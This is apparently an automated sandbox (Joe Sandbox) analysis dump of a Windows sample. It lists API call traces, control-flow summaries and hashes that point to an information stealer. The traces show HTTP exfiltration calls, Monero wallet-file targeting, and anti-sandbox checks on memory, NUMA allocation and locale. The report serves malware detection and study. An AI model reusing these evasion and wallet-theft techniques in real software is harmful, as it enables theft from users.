                                      • GetProcAddress.KERNEL32(751E0000,01535228), ref: 00ADA3EA
                                      • GetProcAddress.KERNEL32(751E0000,0154DE80), ref: 00ADA402
                                      • GetProcAddress.KERNEL32(751E0000,01548988), ref: 00ADA41A
                                      • GetProcAddress.KERNEL32(751E0000,0154DF28), ref: 00ADA433
                                      • GetProcAddress.KERNEL32(751E0000,01535248), ref: 00ADA44B
                                      • GetProcAddress.KERNEL32(700F0000,0153A6D0), ref: 00ADA470
                                      • GetProcAddress.KERNEL32(700F0000,015354E8), ref: 00ADA489
                                      • GetProcAddress.KERNEL32(700F0000,0153A860), ref: 00ADA4A1
                                      • GetProcAddress.KERNEL32(700F0000,0154DDD8), ref: 00ADA4B9
                                      • GetProcAddress.KERNEL32(700F0000,0154DF70), ref: 00ADA4D2
                                      • GetProcAddress.KERNEL32(700F0000,01535648), ref: 00ADA4EA
                                      • GetProcAddress.KERNEL32(700F0000,01535668), ref: 00ADA502
                                      • GetProcAddress.KERNEL32(700F0000,0154DDC0), ref: 00ADA51B
                                      • GetProcAddress.KERNEL32(753A0000,015355E8), ref: 00ADA53C
                                      • GetProcAddress.KERNEL32(753A0000,015354C8), ref: 00ADA554
                                      • GetProcAddress.KERNEL32(753A0000,0154DDF0), ref: 00ADA56D
                                      • GetProcAddress.KERNEL32(753A0000,0154DEB0), ref: 00ADA585
                                      • GetProcAddress.KERNEL32(753A0000,01535628), ref: 00ADA59D
                                      • GetProcAddress.KERNEL32(76310000,0153A680), ref: 00ADA5C3
                                      • GetProcAddress.KERNEL32(76310000,0153A450), ref: 00ADA5DB
                                      • GetProcAddress.KERNEL32(76310000,0154DF58), ref: 00ADA5F3
                                      • GetProcAddress.KERNEL32(76310000,01535368), ref: 00ADA60C
                                      • GetProcAddress.KERNEL32(76310000,01535388), ref: 00ADA624
                                      • GetProcAddress.KERNEL32(76310000,0153A478), ref: 00ADA63C
                                      • GetProcAddress.KERNEL32(76910000,0154DEC8), ref: 00ADA662
                                      • GetProcAddress.KERNEL32(76910000,015356A8), ref: 00ADA67A
                                      • GetProcAddress.KERNEL32(76910000,015488D8), ref: 00ADA692
                                      • GetProcAddress.KERNEL32(76910000,0154DE08), ref: 00ADA6AB
                                      • GetProcAddress.KERNEL32(76910000,0154DEF8), ref: 00ADA6C3
                                      • GetProcAddress.KERNEL32(76910000,01535688), ref: 00ADA6DB
                                      • GetProcAddress.KERNEL32(76910000,015353A8), ref: 00ADA6F4
                                      • GetProcAddress.KERNEL32(76910000,0154DE38), ref: 00ADA70C
                                      • GetProcAddress.KERNEL32(76910000,0154DF10), ref: 00ADA724
                                      • GetProcAddress.KERNEL32(75B30000,01535608), ref: 00ADA746
                                      • GetProcAddress.KERNEL32(75B30000,0154DEE0), ref: 00ADA75E
                                      • GetProcAddress.KERNEL32(75B30000,0154DF40), ref: 00ADA776
                                      • GetProcAddress.KERNEL32(75B30000,0154DE20), ref: 00ADA78F
                                      • GetProcAddress.KERNEL32(75B30000,0154DE68), ref: 00ADA7A7
                                      • GetProcAddress.KERNEL32(75670000,01535588), ref: 00ADA7C8
                                      • GetProcAddress.KERNEL32(75670000,01535448), ref: 00ADA7E1
                                      • GetProcAddress.KERNEL32(76AC0000,01535348), ref: 00ADA802
                                      • GetProcAddress.KERNEL32(76AC0000,0154DE98), ref: 00ADA81A
                                      • GetProcAddress.KERNEL32(6F4E0000,01535508), ref: 00ADA840
                                      • GetProcAddress.KERNEL32(6F4E0000,015356C8), ref: 00ADA858
                                      • GetProcAddress.KERNEL32(6F4E0000,01535548), ref: 00ADA870
                                      • GetProcAddress.KERNEL32(6F4E0000,0154D9E8), ref: 00ADA889
                                      • GetProcAddress.KERNEL32(6F4E0000,015356E8), ref: 00ADA8A1
                                      • GetProcAddress.KERNEL32(6F4E0000,01535428), ref: 00ADA8B9
                                      • GetProcAddress.KERNEL32(6F4E0000,015353C8), ref: 00ADA8D2
                                      • GetProcAddress.KERNEL32(6F4E0000,01535468), ref: 00ADA8EA
                                      • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00ADA901
                                      • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00ADA917
                                      • GetProcAddress.KERNEL32(75AE0000,0154D880), ref: 00ADA939
                                      • GetProcAddress.KERNEL32(75AE0000,01548908), ref: 00ADA951
                                      • GetProcAddress.KERNEL32(75AE0000,0154D8E0), ref: 00ADA969
                                      • GetProcAddress.KERNEL32(75AE0000,0154DA78), ref: 00ADA982
                                      • GetProcAddress.KERNEL32(76300000,015353E8), ref: 00ADA9A3
                                      • GetProcAddress.KERNEL32(6FE20000,0154D9B8), ref: 00ADA9C4
                                      • GetProcAddress.KERNEL32(6FE20000,01535488), ref: 00ADA9DD
                                      • GetProcAddress.KERNEL32(6FE20000,0154D9D0), ref: 00ADA9F5
                                      • GetProcAddress.KERNEL32(6FE20000,0154D7C0), ref: 00ADAA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 23478cc691b4a7c599f741bc5bef8610d07f1dca6a52c7217e790e66623f71b2
                                      • Instruction ID: dc362a56f792334e1e404d8ff1d5097d8e855ddb34b5d0d160b1c04bada6c093
                                      • Opcode Fuzzy Hash: 23478cc691b4a7c599f741bc5bef8610d07f1dca6a52c7217e790e66623f71b2
                                      • Instruction Fuzzy Hash: 87620BB5638300AFC344DFA8ED889567BB9BB8D701B10961BBA09D3374D735A941CB78

                                      Control-flow Graph (function starting at 00AC48D0; rendered graph with executed/not-executed colouring not reproduced)
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AC4965
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC4B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00AE0DDE,00000000,?,?,00000000,?,",00000000,?,0154FD40), ref: 00AC4E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AC4E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AC4E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AC4E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC4EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC4F15
                                      • HttpOpenRequestA.WININET(00000000,0154FCE0,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC4B65
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC4F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: 690bc17fffd8e7323a5e99fbdb1a18608ee69c8f2d021fa0af5fe98f89556c64
                                      • Instruction ID: 407416d8fc94f191b0b2d7be9ece561a313ebc8df22b47ca2d7f6d851a7f4657
                                      • Opcode Fuzzy Hash: 690bc17fffd8e7323a5e99fbdb1a18608ee69c8f2d021fa0af5fe98f89556c64
                                      • Instruction Fuzzy Hash: 5A12EC72910218AACB14EB90DEA6FEEB379BF24300F50459AF14762291DF706F49CB65

                                      Control-flow Graph (function starting at 00AD5760; rendered graph with executed/not-executed colouring not reproduced)
                                      APIs
                                        • Part of subcall function 00ADAB30: lstrlen.KERNEL32(00AC4F55,?,?,00AC4F55,00AE0DDF), ref: 00ADAB3B
                                        • Part of subcall function 00ADAB30: lstrcpy.KERNEL32(00AE0DDF,00000000), ref: 00ADAB95
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD58F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5AA7
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AD5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5478
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5568
                                        • Part of subcall function 00AD5510: lstrlen.KERNEL32(00000000), ref: 00AD557F
                                        • Part of subcall function 00AD5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00AD55B4
                                        • Part of subcall function 00AD5510: lstrlen.KERNEL32(00000000), ref: 00AD55D3
                                        • Part of subcall function 00AD5510: lstrlen.KERNEL32(00000000), ref: 00AD55FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD59DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00AD5C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: c3ac4bc49035e7a688544a1bbfc811edabe6bf7be45778876d595949a9211736
                                      • Instruction ID: ad4b42bb37de56e593415b59d286255b5fb64278db75ec942cf403019af77846
                                      • Opcode Fuzzy Hash: c3ac4bc49035e7a688544a1bbfc811edabe6bf7be45778876d595949a9211736
                                      • Instruction Fuzzy Hash: 1BE13372A101049ACB14FBB0DE66EED733DAF64340F40855BB54766291EF35AF09CB62

                                      Control-flow Graph (function starting at 00AD19F0; rendered graph with executed/not-executed colouring not reproduced)
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00AD1A15
                                      • ExitProcess.KERNEL32 ref: 00AD1A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 63beb5f56ba4212e74a410d9d7a083f47a3c6391a46d375db38c8b6d9145d286
                                      • Instruction ID: 44ba69410a3eab583aa9e409faabe318e0f2f1150dc2b7d42a535e2bafe4906a
                                      • Opcode Fuzzy Hash: 63beb5f56ba4212e74a410d9d7a083f47a3c6391a46d375db38c8b6d9145d286
                                      • Instruction Fuzzy Hash: 2651F778B58209BBDB14DFA4DA94EAE77B9EF44704F10444BE803AB390E770E941CB61

                                      APIs
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541698), ref: 00AD9BF1
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541710), ref: 00AD9C0A
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541668), ref: 00AD9C22
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541740), ref: 00AD9C3A
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541788), ref: 00AD9C53
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01548A78), ref: 00AD9C6B
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01534F88), ref: 00AD9C83
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01535308), ref: 00AD9C9C
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541620), ref: 00AD9CB4
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01541578), ref: 00AD9CCC
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,015417A0), ref: 00AD9CE5
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,015417B8), ref: 00AD9CFD
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,01535288), ref: 00AD9D15
                                        • Part of subcall function 00AD9BB0: GetProcAddress.KERNEL32(76210000,015415F0), ref: 00AD9D2E
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AC11D0: ExitProcess.KERNEL32 ref: 00AC1211
                                        • Part of subcall function 00AC1160: GetSystemInfo.KERNEL32(?), ref: 00AC116A
                                        • Part of subcall function 00AC1160: ExitProcess.KERNEL32 ref: 00AC117E
                                        • Part of subcall function 00AC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AC112B
                                        • Part of subcall function 00AC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AC1132
                                        • Part of subcall function 00AC1110: ExitProcess.KERNEL32 ref: 00AC1143
                                        • Part of subcall function 00AC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AC123E
                                        • Part of subcall function 00AC1220: __aulldiv.LIBCMT ref: 00AC1258
                                        • Part of subcall function 00AC1220: __aulldiv.LIBCMT ref: 00AC1266
                                        • Part of subcall function 00AC1220: ExitProcess.KERNEL32 ref: 00AC1294
                                        • Part of subcall function 00AD6A10: GetUserDefaultLangID.KERNEL32 ref: 00AD6A14
                                        • Part of subcall function 00AC1190: ExitProcess.KERNEL32 ref: 00AC11C6
                                        • Part of subcall function 00AD79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AC11B7), ref: 00AD7A10
                                        • Part of subcall function 00AD79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7A17
                                        • Part of subcall function 00AD79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AD7A2F
                                        • Part of subcall function 00AD7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7AA0
                                        • Part of subcall function 00AD7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7AA7
                                        • Part of subcall function 00AD7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00AD7ABF
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD6D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD6D99
                                      • Sleep.KERNEL32(00001770), ref: 00AD6DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6DBA
                                      • ExitProcess.KERNEL32 ref: 00AD6DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: ffcdfad232bfb60ef541e0267271994a873507df36029fbba972c33e28bd35eb
                                      • Instruction ID: 573756660d474a8807717ba81f7cf1fcc681b5b04999aa18afe95d31913c2300
                                      • Opcode Fuzzy Hash: ffcdfad232bfb60ef541e0267271994a873507df36029fbba972c33e28bd35eb
                                      • Instruction Fuzzy Hash: EA310871A14208ABCB04FBF0DE66BEE7379AF24340F50091BF153A6392DF746A058666

                                      Control-flow Graph

                                      • Basic blocks (node, address range, calls):
                                        • 1436 ac1220-ac1247: call ad8b40, GlobalMemoryStatusEx
                                        • 1439 ac1249-ac1271: call addd30 (x2)
                                        • 1440 ac1273-ac127a
                                        • 1441 ac1281-ac1285
                                        • 1443 ac129a-ac129d
                                        • 1444 ac1287
                                        • 1446 ac1289-ac1290
                                        • 1447 ac1292-ac1294: ExitProcess
                                      • Edges: 1436->1439, 1436->1440, 1439->1441, 1440->1441, 1441->1443, 1441->1444, 1444->1446, 1444->1447, 1446->1443, 1446->1447
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AC123E
                                      • __aulldiv.LIBCMT ref: 00AC1258
                                      • __aulldiv.LIBCMT ref: 00AC1266
                                      • ExitProcess.KERNEL32 ref: 00AC1294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 81ee7bde09a5fa6b3dfdcdb7f81886c7f23bab0abb9ad2765df72d398d59b871
                                      • Instruction ID: 4d9f1a438ed74212be98532f7cdeab983f4766531c5d478d27a46ff8d7521fc7
                                      • Opcode Fuzzy Hash: 81ee7bde09a5fa6b3dfdcdb7f81886c7f23bab0abb9ad2765df72d398d59b871
                                      • Instruction Fuzzy Hash: 33016DB0E40308FBEF10EFE4CD4AFEEBBB8AB15705F20845AE605B62C1D67455418769

                                      Control-flow Graph

                                      • Basic blocks (node, address range, calls):
                                        • 1450 ad6d93
                                        • 1451 ad6daa
                                        • 1453 ad6dac-ad6dc2: call ad6bc0, call ad5d60, CloseHandle, ExitProcess
                                        • 1454 ad6d5a-ad6d77: call adade0, OpenEventA
                                        • 1460 ad6d79-ad6d91: call adade0, CreateEventA
                                        • 1461 ad6d95-ad6da4: CloseHandle, Sleep
                                      • Edges: 1450->1451, 1451->1453, 1451->1454, 1454->1460, 1454->1461, 1460->1453, 1461->1451
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD6D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD6D99
                                      • Sleep.KERNEL32(00001770), ref: 00AD6DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01548A48,?,00AE10F4,?,00000000,?,00AE10F8,?,00000000,00AE0AF3), ref: 00AD6DBA
                                      • ExitProcess.KERNEL32 ref: 00AD6DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 2ffa3fad0b56e06befdc363524d758bb5523ddb27bb89babdd92deb252f5da97
                                      • Instruction ID: 3453826f5859ae1f6f10c975b5cd4cdd87c8876846c4b6f57ed9961cb0243767
                                      • Opcode Fuzzy Hash: 2ffa3fad0b56e06befdc363524d758bb5523ddb27bb89babdd92deb252f5da97
                                      • Instruction Fuzzy Hash: 27F0F830A58709ABEB10ABA0ED0ABBE7776AF24702F100517B593A5391DBB05600CA69

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 1ca140350179ffc4cde3a1fcf180e9c624c5ef68cad7e897fc233dbd69af5dd2
                                      • Instruction ID: 56af4c71c37868d74a1a9893a6530fa61e8a812a3c12d84724a50cb226f2cf39
                                      • Opcode Fuzzy Hash: 1ca140350179ffc4cde3a1fcf180e9c624c5ef68cad7e897fc233dbd69af5dd2
                                      • Instruction Fuzzy Hash: 0F213EB5D00209ABDF14DFA4E845BDE7B75FB45320F108625F955A72C0EB706A09CB91

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC62D0: InternetOpenA.WININET(00AE0DFF,00000001,00000000,00000000,00000000), ref: 00AC6331
                                        • Part of subcall function 00AC62D0: StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6353
                                        • Part of subcall function 00AC62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC6385
                                        • Part of subcall function 00AC62D0: HttpOpenRequestA.WININET(00000000,GET,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC63D5
                                        • Part of subcall function 00AC62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AC640F
                                        • Part of subcall function 00AC62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AC6421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AD5478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 0bdb80433c872e72b6b2ed0ecc0e5e4a64aee8495b217d0e3696251196042d2f
                                      • Instruction ID: 7d165789e18db9f82a98a8472fe31f571957a9b11eda43f8e1c1925f054c39ce
                                      • Opcode Fuzzy Hash: 0bdb80433c872e72b6b2ed0ecc0e5e4a64aee8495b217d0e3696251196042d2f
                                      • Instruction Fuzzy Hash: 1D111670910108ABCB14FF74DE56EED7379AF60340F40455AF91B576A2EF30AB05C651
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00AD7ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: a1f52e3e97bdb9243112a08b89766c319fd2d85197aaf43c0aa88572e393a813
                                      • Instruction ID: 158b348193bb341adb0d1155944364e80a546ee0245531cf5dbcf3433b7b6100
                                      • Opcode Fuzzy Hash: a1f52e3e97bdb9243112a08b89766c319fd2d85197aaf43c0aa88572e393a813
                                      • Instruction Fuzzy Hash: B60186B1958349ABC704DF99DD45FAEBBB8F704B55F10015BF506E3390E7B45A0087A1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AC112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00AC1132
                                      • ExitProcess.KERNEL32 ref: 00AC1143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: ab51cf51b5cd380ba1136296c0aba5a50486b3a56be099ee51682b34c4e79c2b
                                      • Instruction ID: f9f79a010882ce44d30cdafcf21e955bfaf27d122c6cf6e7a266d6af4f2d6567
                                      • Opcode Fuzzy Hash: ab51cf51b5cd380ba1136296c0aba5a50486b3a56be099ee51682b34c4e79c2b
                                      • Instruction Fuzzy Hash: E6E0E670B59308FBE7105B909D0AF4D76689B05B15F10015AF709B62D1C6B56540566D
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AC10B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AC10F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 7c0afb699d2fe5a00441ea439e9f43ea66ee140349f98d835567a7d9c6b30fe1
                                      • Instruction ID: 942069800f66c26700c80d2611bc3d7ccb5997319238a7a57a9b0eda0e868707
                                      • Opcode Fuzzy Hash: 7c0afb699d2fe5a00441ea439e9f43ea66ee140349f98d835567a7d9c6b30fe1
                                      • Instruction Fuzzy Hash: 1AF0E2B1641308BBE7149BA4AC59FAEB798E705B05F300449F500E7380D6719E00CAA4
                                      APIs
                                        • Part of subcall function 00AD7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7AA0
                                        • Part of subcall function 00AD7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7AA7
                                        • Part of subcall function 00AD7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00AD7ABF
                                        • Part of subcall function 00AD79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AC11B7), ref: 00AD7A10
                                        • Part of subcall function 00AD79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7A17
                                        • Part of subcall function 00AD79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AD7A2F
                                      • ExitProcess.KERNEL32 ref: 00AC11C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
